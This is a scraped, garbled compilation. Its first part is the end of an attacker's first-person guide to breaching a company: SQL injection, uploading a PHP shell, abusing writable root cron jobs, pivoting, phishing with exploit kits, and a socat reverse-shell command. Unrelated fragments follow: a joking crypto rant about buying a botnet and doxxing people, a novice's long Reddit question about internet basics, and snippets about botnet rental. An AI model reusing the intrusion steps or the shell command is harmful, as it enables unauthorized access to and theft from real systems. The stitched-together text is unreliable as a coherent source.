reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! -- 5 -- (fail at) Escalating < got r00t? >
Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester, and unix-privesc-check. finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer:
wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. -- 6 -- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. -- 7 -- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to:
Hack Gamma and obtain a copy of the FinSpy server software
Find vulnerabilities in FinSpy server.
Scan the internet for, and hack, all FinSpy C&C servers.
Identify the groups running them.
Use the C&C server to upload and run a program on all targets telling them who was spying on them.
Use the C&C server to uninstall FinFisher on all targets.
Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! -- 8 -- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browsejava/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker. -- 9 -- Resources Links:
http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:tty,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff.
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. -- 10 -- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!
Big O evaluation. Visa transacts up to 24,000 transactions per second 24,000 tps * avg transaction size 400 bytes 9.6MB/s for 10 min blocks = 5.76GB Block Size Running said crap coin for one week = 5.8TB Running crapCash for one year = 301TB 301TB = 25 * Seagate 12TB @ $449 = $6000/year There you have it. If all the nodes just bought 25 of these drives per year to validate and store the blockchain, we could run crapCash5.76GB at the same TPS as Visa. Proposal: I will buy enough hard drives for us to uphold network for five years, working on a discount with Newegg. I will rent out a large office and run all of the nodes for you, working with local governments to subsidize electricity costs. No need for high internet costs as everything will be run over LAN, to rid the need of propagating 5.76GB blocks. We will then collectively have enough power to cause the "flippening". Will buy a botnet to help build meme's in $1 increments for maximum price resistance. We will also use Bitcoin mod privileges to dox anyone and post their public information online. Middle fingers required. This is Satoshi's true vision as described in the white paper. We cannot let Core decide our fate for us. I work at McDonald's part time and got my GED, if I can do the math why should we allow this monopoly of "Engineers" to even weigh in on the matter. TLDR; /s
What entity manages .com, .net, .gov, .us, .cn domains?
For the longest time I still have not a clue how this works. I am not sure if this is the right subreddit or something like networking This is all I understand so far about the web (or internet?), computers, and electronics in general (its super long just skip to bold part if you need to) INTERNET:
Computers linked to network with standard protocols, such as HTTP/ HTTPS over the world wide consortium standards, forming conglomerate of computers linked together. ISP's take information from said networks and transfer data to other ISP's via nodes, through hardwire connections and transatlantic cable.
IP addresses identify your local network through the ISP. Subnet mask, gateways, etc and traffic can be redirected via VPN. Also, on local side, you have the PC=>Router (optional) => Modem => ISP, where the router helps divide the modem so multiple PC's can connect to one line. Also WiFi operates by a specific hardware device (wifi dongle, router) and transfers information via electromagnetic waves. Same with cellphones (Via cellphone towers). Also satellites help direct cellular traffic through direct line of sight connections from user=>satellite=>user.
URL's utilize world wide consortium stsandards, using www. as the default subdomain, the web address, and the end? domain (like .com)
Domains are rented out through 3rd parties such as godaddy, and are never physically owned. Subdomains are like m.reddit.com (for mobile use) or MyWebsite.blogspot.com
Search engines like google uses properitary algorithms /datastacks/ web crawlers to build a huge database of all existing URL's and rates them through its servers (SEO)
Servers are just high powered PC's generally running Linux and processes incoming data / sends out packets of data, generally in fancy server rooms
DDoS is denial of service through botnet attacks via malware infections of computers, utilizing other people's computer resources (there's more than one way of doing this). Also, ports get overridden with lots of useless requests, denying service to legit people who want to use said site hosted on said server
Throttling occurs due to ISP's limiting data pipeline through its end, not sure what goes on here though
Deep web (or dark web?) is essentially hosting a bunch of private URLs, not visible publicly and accessed through specific private search engines.
Torrents are accessed via peer 2 peer (Seeding and leeching) and managed client-side with utorrent, rutorrent, etc which manages traffic for the requests for .torrent downloads, and public torrent links are through sites like pirate bay, kickass torrents, etc
Programming languages (Fortran, C++, Java) were generally formed originally from assembly code and binary in the form of different modules. People had different opinions of how data and protocols were made, so hence different languages
Virtual machines, its a high powered PC generally that divides its resources to host several virtual PC's. Lots of variations of how datastacks are managed
Personal computers work via motherboard, ram sticks, GPU (like nvidia GTX Titan or intel graphics 4000), Cores / hyperthreading (like corei7 from intel), monitors, etc. Say you run a PC without internet and run a game like witcher 3. You run an executable file, which is written by C++. GPU renders data supplied by executable, (e.g. render this room given this data under this game engine), ram (random access memory) is used as all the unprocessed data needs to sit somewhere?, various caches (L3) for processing common data quickly, core (i7) for processing data as a whole, motherboard and OS mediates all data being transferred.
Github is used for subversion control, and its now cloud based too (although it was originally local / lan only). Github is done via pulls , requests, call, etc. to monitor versions. You can technically emulate this on paper using sticky notes, but its not efficient
Hardware electronic wise, voltage and current is analgous to a water pipeline, where VOLUME WATER FLOW = CIRCUMFERENCE * VELOCITY WATER. In this case, POWER = VOLTAGE * CURRENT. Kerchoff's law, parallel series circuits, PCIBs, quantum theory, transistors (3 prongs), OR NAND NOT gates, arrays, resistors, potentiometers, timers, arduino, bread boards, soldering, relays, switches, that kind of thing (I'm not an EE). Anyways, hardware generally requires a specific amount of voltage and current for things to run on the computer
Operating Systems are linux, windows, macs, etc, and runs through a succession of modules created by assembly code and programming based languages such as C++.
DBMS utilizes crud (create read update delete). MySQL works. Can be emulated on a piece of paper, technically
XML (eXtensible markup language) just is used to communicate between different languages
API (application programming interface) is basically a user manual of all the functions publicly available to pull from a program, locally or on a server. E.G. imgur provides a bunch of API's, I can use its resources because I know said API, and make a program out of it. UPS has a bunch of available API, so I can pull that shit and make a ecommerce shipping module or something.
RAID (RAID 1-5) is just like how data is split into different hard drives. E.G. I have a file. File is split 3 ways into 3 different raid drives and pulled all at once when I request for it, its done this way because file transfers are faster when split into multiple data pipelines.)
Ads make the web profitable. Lots of big name companies make lots of $ selling services and goods at high margins, goes back and dumps money in marketing. Facebook CPC, youtube Ads, youtube videos with ads built into the video (techquickie), social media (instagram, kik, w/e), free game riddled with sidebar ads, banner ads, adblock letting forbe's ads through. Or 4% amazon commission based on referrals. Or Hulu plus style ads, pay to get rid of ads / pay for full service.
web services and goods. microsoft office, reddit gold, renting a server, anything on amazon, that kind of thing. Money.
bitcoin is cryptography based, and can be mined (but not profitable due to energy and hardware limitations for the average person). Bitcoin is generated through computers working out some sort of very encrpyted password node. Bitcoins stored on a server side application (Accessed via website), or through just a web URL, or a client side application (on your phone, desktop program). Bitcoin bought through local transactions, link credentials and bank account, also not easily traceable? (debatable here)
Blackhat Hacking (what people think of generally, not DIY hardware hacks, writing a program, or modifying an existing code) is done on unsecured websites. Usually said website is running some backend application like wordpress, shopify, drupal, modules commerce. Changes are made in the core code over time, and those changes sometimes lead to vulnerabilities that people aren't aware. Hackers send requests (MySQL injection is one of these?) to find more about how the server side application works, and looks for some way to override and obtain admin credentials by having server side reveal this information. White hat is the opposite. Red hat is for linux
Virus, worms, trojans. Usually runs on an attached .exe file or application, but has been known to somehow work with images too. Also worked with emails (worms) in the past. This is mostly magic to me too, I just know how to prevent it. PUP is just potentially unwanted programs (aka bloatware) that comes preinstalled from HP / ASUS/ ACER, etc, or comes along for the ride when you download a program off Cnet.
Data selling. Especially mobile apps (I mean you have to give them permission on everything), they take data, sell to data brokers, which businesses buy to make marketing decisions. Same with lots of things that don't seem to generate money, e.g. chrome plugins, you are the money generator for them via data. Insert google overlords and big 5 internet companies giving data to government via PRISM/snowden (didn't something like this go into effect in 2015?) . Also insert malicious data theft and brokers (social engineering, telemarketers trying to get your credit card, entering information on non HTTPS secured sites).
VoIP is just a specific protocol (like https) for how phone calls transferred over web, and maintain quality of said audio
Image compression is done via bit map rasterization. DNG files or propietary raw formats are utilized in native applications like adobe photoshop. .GIFS are simply image slideshows, actually all videos are image slideshows. Vectorization is mostly talked about when using illustrator or cad based programs (Solidworks, CATIA, AutoCAD)
Programs can be bypassed (e.g. Sony Vegas Pro) by core modification of its files (you'd need to breach password credentials though?) and be made into a "crack file" . A keygen treats the program normally, but just bypasses security checks externally (e.g. preventing company server from doing checks by blocking certain URLs, and a keygen from Xforce that is made by finding security criteria for successful serial# installs)
Rooting your phone is like getting full super user access on linux, but also comes at a price leaving you vulnerable to security breaches
Domain name service managers like namecheap just helps you manage how you rent your domain.
FTP is file transfer protocol to transfer files from one computer to another. SFTP is just secured FTP, whatever that means. SSH is shell access, e.g. almost like your sitting on that computer over on the other side of the world as opposed to just accessing files only.
Email servers are done by IMAP, POP3, email is transferred purely text based (attached files go through a different channel) to be sent from one email to another via email. POP3 is stored more localish side, IMAP is more server based (its slower, but easily accessible anywhere)
Windows API, windows registry, Linux commands are still magic to me. Sudo super user something.
Okay, but who manages the .info, .com, .net, .cn, .rs, and .gov top level domains? There's obviously some domains that are specific to countries, and are most likely managed by that countries' government entity. E.G (.us for usa? .ws for russia, .cn for china) but aren't nearly as popular as the .net and .com domains. .Org and .gov are US? government regulated top level domains to my knowledge, where .org is mostly nonprofit. U.S.A uses .gov domains for its government organizations So I understand that some countries government manages that domain. But what about public top level domains, like .com, .info, .net, .ca? Who manages the database for those? Who gives authority to godaddy for those domains for rent? Who mediates copyright conflicts for those domains? (E.G. say my name is Mike Cro Soft, and I wanted to rent a domain called mikecrosoft, but get DMCA'd / copyrighted by microsoft.com) Like, what are the big organizations mediating internet protocols and legislation on a global scale? Who or what has access to the biggest picture of the web, and its workings and backend? sorry for the long wall of text, I've been missing some vital information on how the web? (or is it internet?) works disclaimer: I don't take CS classes and did not major in computer science. So I might be really off in what i understand about the internet as a whole. Most of this is just what I learned from browsing reddit and youtube Apologies in advance if i butchered a bunch of terms and how things work. I just wrote things as they randomly came to me
In this paper, we present ZombieCoin, a botnet command-and-control (C&C) mechanism that leverages the Bitcoin network. ZombieCoin offers considerable advantages over existing C&C techniques, most ... It turns out, not much is needed to actually rent a botnet. Usually, it boils down to a PayPal account, ill-will towards the target and willingness to break the law. As strange as it may sound, today just about anyone can use a stresser to paralyze an unprotected website for a small fee. To locate one of these you don’t even need to school yourself in the mysterious ways of the Deep Web ... Do they accept payment in bitcoin and is the botnet big enough to mine more BTC/hr than the rental cost in BTC/hr? Hmm. Re: (Score: 1) by Anonymous Coward. Even if you can't make money on those things with BitCoin, if they accepted BioCoin payments (LOLZ) that would make it possible to rent these systems 100% anonymously, and would finally provide a use for BitCoins. Re: (Score: 2) by retchdog ... Copy-paste botnet, copy-paste website. After analysing both the website and the botnet, we discovered that the codes used have been copy-pasted from an open source and modified for their own purposes. In fact, the 0x-booter website was based on another booter/ stresser called Ninjaboot, the source code of which was leaked in hacking forums last year. Even though the Bushido botnet has its own ... The botmaster performs illegal tasks himself or rent his botnet to others and often charge them by the hour. Botnets are typically used for spamming, serving the illegal material, click fraud, search engine optimization (SEO), and often for Bitcoin mining. Mostly the victims of botnets attacks are unaware of their system breaching. This is because the targets of botnet attacks are mostly those ...
The Denial of Service Underground: DDoS Perpetrators and Attacks Exposed
If you've ever wondered why some people think renting is better than owning, here's the explanation behind how that can be true. Have more than you show, speak less than you know. Already, hackers have used botnets, online networks of computers, to increase their ability to process transactions and mine bitcoins. These dynamics make watching Bitcoin a lot like watching ... Today’s topics include a costly security breach of Bitcoin exchange site NiceHash; Microsoft and ESET working with law enforcement to disrupt the Gamarue botnet; Apple updating its macOS and iOS ... In 2014, before Ethereum and altcoin mania, before ICOs and concerns about Tether and Facebook's Libra, Motherboard gained access to a massive and secretive ...